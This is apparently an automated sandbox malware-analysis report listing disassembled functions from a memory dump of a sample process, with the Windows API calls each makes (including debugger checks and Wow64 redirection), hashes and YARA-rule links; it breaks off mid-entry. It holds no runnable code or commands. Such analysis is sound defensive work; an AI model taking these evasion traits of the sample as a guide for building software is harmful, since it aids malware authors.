                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001732A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsThemeActive.UXTHEME ref: 001732C4
                                                                                                      • Part of subcall function 0017326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00173282
                                                                                                      • Part of subcall function 0017326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00173299
                                                                                                      • Part of subcall function 00173312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001732EF,?), ref: 00173342
                                                                                                      • Part of subcall function 00173312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001732EF,?), ref: 00173355
                                                                                                      • Part of subcall function 00173312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00242418,00242400,?,?,?,?,?,?,001732EF,?), ref: 001733C1
                                                                                                      • Part of subcall function 00173312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00242418,?,?,?,?,?,?,?,001732EF,?), ref: 00173442
                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 001732FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                    • String ID:
                                                                                                    • API String ID: 1550534281-0
                                                                                                    • Opcode ID: f65b37929c440f498b409e8ee27bacebf2538232e207765d2776b5e533645cec
                                                                                                    • Instruction ID: 5299351a2a5a147032978ea87b53ceaca44e33455c96632bc986c453e8ddcb78
                                                                                                    • Opcode Fuzzy Hash: f65b37929c440f498b409e8ee27bacebf2538232e207765d2776b5e533645cec
                                                                                                    • Instruction Fuzzy Hash: 0DF0BE36504344EFE700AFA1FC0EB247FB4BB05705F908805F508951E3CBB98594AB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0018F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • timeGetTime.WINMM ref: 0018F97A
                                                                                                      • Part of subcall function 0017EDFE: GetInputState.USER32 ref: 0017EEB7
                                                                                                    • Sleep.KERNEL32(00000000), ref: 001CFAC2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InputSleepStateTimetime
                                                                                                    • String ID:
                                                                                                    • API String ID: 4149333218-0
                                                                                                    • Opcode ID: 60728f4ed894e1d81b3244d50feaba4dd6efe21ba5097be030f548ec59a44a5d
                                                                                                    • Instruction ID: fc80e82a56b6600493ba959e0e64e57c38047dceafa3d326b10ea522c2296e0f
                                                                                                    • Opcode Fuzzy Hash: 60728f4ed894e1d81b3244d50feaba4dd6efe21ba5097be030f548ec59a44a5d
                                                                                                    • Instruction Fuzzy Hash: 55F08C722446059FD354EBA9D409F5AF7FAFF58364F00842EE85EC7261DB70A800CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001994D1 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001A506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00239C08,00000010,001994DE), ref: 001A50CC
                                                                                                      • Part of subcall function 001A506A: _free.LIBCMT ref: 001A50DA
                                                                                                      • Part of subcall function 001A510A: _free.LIBCMT ref: 001A512C
                                                                                                    • DeleteCriticalSection.KERNEL32(-00000020), ref: 001994FA
                                                                                                    • _free.LIBCMT ref: 0019950E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$CriticalDeleteSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 1906768660-0
                                                                                                    • Opcode ID: 34036338255704af04558a4d1f129e21e3191b79a0f07c00ee794c803ceb831d
                                                                                                    • Instruction ID: 60a8f6961775b0bdd981bea52823eaf7dd3ac0d63c2c69e5cff208d534142390
                                                                                                    • Opcode Fuzzy Hash: 34036338255704af04558a4d1f129e21e3191b79a0f07c00ee794c803ceb831d
                                                                                                    • Instruction Fuzzy Hash: 79E0DF3A908D108BCB21B7FCFC0AA1933E4FF5B368B09040AF41093021DB217CA28A44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00178774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0017AE65,?,?,?), ref: 00178793
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0017AE65,?,?,?), ref: 001787C9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 626452242-0
                                                                                                    • Opcode ID: 7e122aa088bc98eef66364c38167cfca558bf2e616cbcc01fcb89fff104b74f6
                                                                                                    • Instruction ID: 194b3fb660f37c4093dbab57fc83401d98be6a53a777cf8bdea5146c426b1972
                                                                                                    • Opcode Fuzzy Hash: 7e122aa088bc98eef66364c38167cfca558bf2e616cbcc01fcb89fff104b74f6
                                                                                                    • Instruction Fuzzy Hash: 4D0184713412047FEB1D6B699D4BF7F7AADDB89750F14403EB50ADA1D1EE609C009524
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017B4B0 Relevance: 1.9, APIs: 1, Instructions: 432COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c6d18699e25cb261bfe13596771d21a63db1534b710d3595e158cccf1a2c1c64
                                                                                                    • Instruction ID: a6bc976b13b61c692fd30597b34e9e6de19245a07cb7e1bfcd358393eb7c45d5
                                                                                                    • Opcode Fuzzy Hash: c6d18699e25cb261bfe13596771d21a63db1534b710d3595e158cccf1a2c1c64
                                                                                                    • Instruction Fuzzy Hash: 3FF19F70D082199BCF18EF94C8D0BFEB7B5FF58300F54816AE91AA7290DB349A81CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0019F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 124574085c2b9c49eb3f2784ed7f4eecdd05193e3ff7ddb4f2771f220cafad12
                                                                                                    • Instruction ID: 994b94202b378d9681fd955b3d64b413dd07c656efae0437cf21122b665b7625
                                                                                                    • Opcode Fuzzy Hash: 124574085c2b9c49eb3f2784ed7f4eecdd05193e3ff7ddb4f2771f220cafad12
                                                                                                    • Instruction Fuzzy Hash: 3B517075A00208BFDF14DF68C845BA97BB5AB86364F1A816CE858DB391C771ED43CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001DFBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 001DFBE3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BuffCharLower
                                                                                                    • String ID:
                                                                                                    • API String ID: 2358735015-0
                                                                                                    • Opcode ID: f791235aa79348709ac0e87a9da423f398d610d030b546dc84f6161d9a6c078f
                                                                                                    • Instruction ID: d82f8617fc254ddb9f9af8f2fc9728c016a3e563223e11b9952098933c640070
                                                                                                    • Opcode Fuzzy Hash: f791235aa79348709ac0e87a9da423f398d610d030b546dc84f6161d9a6c078f
                                                                                                    • Instruction Fuzzy Hash: 8E41E5B2600609AFCB15EFA4C8819AEB7B9EF58310B11853FE9179B251EB70DF41CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00190000 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateProcess.KERNELBASE ref: 001900AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 560597551-0
                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction ID: 90ec16dd810dcb6c7e7687cc546b95f9ab66e97690e9708f89e54f89588fb33c
                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                    • Instruction Fuzzy Hash: 0031D370A00105DFCB1ACF59C480A69F7A6FB59380B6986A5E40ACB356E732EDC1CBD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001E8E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0017557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00175558,?,?,001B4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0017559E
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 001E8EBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FullNamePathPrivateProfileString
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991638491-0
                                                                                                    • Opcode ID: b438c87335536e6b578808291ba53f44dc9d223d50951225f40bbe754cdfa8fc
                                                                                                    • Instruction ID: 842fd27f5bebc010017d92e9bc882615162da5fdc21d4e9671a52f1f866dc581
                                                                                                    • Opcode Fuzzy Hash: b438c87335536e6b578808291ba53f44dc9d223d50951225f40bbe754cdfa8fc
                                                                                                    • Instruction Fuzzy Hash: 3C211D35600605AFCB11EB64C986CAEBBB5EF59760B048054F9496B3A1CF30FD81CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00176332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 0017633E
                                                                                                      • Part of subcall function 00176332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00176350
                                                                                                      • Part of subcall function 00176332: FreeLibrary.KERNEL32(00000000,?,?,0017637F,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176362
                                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,001760AA,?,00000001,?,?,00000000), ref: 0017639F
                                                                                                      • Part of subcall function 001762FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176304
                                                                                                      • Part of subcall function 001762FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00176316
                                                                                                      • Part of subcall function 001762FB: FreeLibrary.KERNEL32(00000000,?,?,001B54C3,?,?,001760AA,?,00000001,?,?,00000000), ref: 00176329
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2632591731-0
                                                                                                    • Opcode ID: 9973da6ddbd70ac19722293bcef6cf1db9a93c80ca4ba2f5cea75cc702eaf388
                                                                                                    • Instruction ID: 5e72abb8ba028191e52acc0821d145b4e9ffc1596a524eb63147f25ccb54450a
                                                                                                    • Opcode Fuzzy Hash: 9973da6ddbd70ac19722293bcef6cf1db9a93c80ca4ba2f5cea75cc702eaf388
                                                                                                    • Instruction Fuzzy Hash: 7511E332640A05AACB14FB64C806BAD77B5AF70715F20C42EF48BA61C2EFB49A85D750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A8792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    • Opcode ID: 7d5760ef34c7b2034f4e84f10ebf36c6aedf33814ff474da9ec42efde0bacbce
                                                                                                    • Instruction ID: ce4465b4689a4ab41c16d009dbef6650cdadfce129eb2efdc1f3a32e7b2f358c
                                                                                                    • Opcode Fuzzy Hash: 7d5760ef34c7b2034f4e84f10ebf36c6aedf33814ff474da9ec42efde0bacbce
                                                                                                    • Instruction Fuzzy Hash: 4011487590420AAFCB06DF98E94499E7BF5EF49310F104069F809AB311DB30EA218BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0017B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00176B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0017B0AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 501cb219a870b174dfd789e1800a59272a7d0b249213122d2b395690c2ed4b3f
                                                                                                    • Instruction ID: 9adce7a5ab9a6c3eabb6223190075d0ade0be1b26ea9416af5c9aa3ff33e03d0
                                                                                                    • Opcode Fuzzy Hash: 501cb219a870b174dfd789e1800a59272a7d0b249213122d2b395690c2ed4b3f
                                                                                                    • Instruction Fuzzy Hash: 68113631208705DFD7208E15C880B67B7F9EF44364F10C42EE9AA8BA51C7B1A945CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A5390 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 001A500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,001A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 001A504E
                                                                                                    • _free.LIBCMT ref: 001A53FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 614378929-0
                                                                                                    • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                    • Instruction ID: 21a075da676e206e793da3b29b57523078489a6a0375d81cc371fc152fbac900
                                                                                                    • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                    • Instruction Fuzzy Hash: 630126B62087056BE7218E699845A5AFBD9FFCA370F25061DE1D497280EB70A805CA74
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0019E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                    • Instruction ID: 2ba1aeb7000eb1d69baf77dd0b6b7beb5e8be827a8f858662ab55fec4989b062
                                                                                                    • Opcode Fuzzy Hash: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                    • Instruction Fuzzy Hash: 65F0A4365016205ADF256A7ADC05B6A36D89F63338F150B19F865921D1DF74E80286A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 001A500D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,001A31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 001A504E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.1605808658.0000000000171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00170000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.1605754470.0000000000170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.000000000020D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1605954628.0000000000233000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606042874.000000000023D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.1606093728.0000000000245000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_170000_ewdbwwfpdh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 63764ec46d9072077bb2310c3d7b93540037b1d0e61723773494fb04645fb444
                                                                                                    • Instruction ID: 97e7acd5c1d7cdc74326ee6787fc89d635bac0a95434fedfbf562ca4c3c2f435
